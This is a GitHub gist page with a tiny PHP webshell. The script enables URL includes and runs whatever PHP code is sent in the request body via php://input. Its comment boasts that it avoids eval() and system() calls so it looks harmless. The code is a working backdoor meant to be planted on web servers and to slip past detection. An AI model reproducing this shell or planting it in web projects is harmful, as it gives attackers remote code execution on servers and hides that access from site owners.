Created
October 31, 2015 02:58
-
-
Save ahhh/ff8b257f72396c43f4cf to your computer and use it in GitHub Desktop.
A php url include webshell, inspired by: http://insecurety.net/?p=757
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
ini_set('allow_url_include, 1'); // Allow url inclusion in this script | |
// No eval() calls, no system() calls, nothing normally seen as malicious. | |
include('php://input'); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment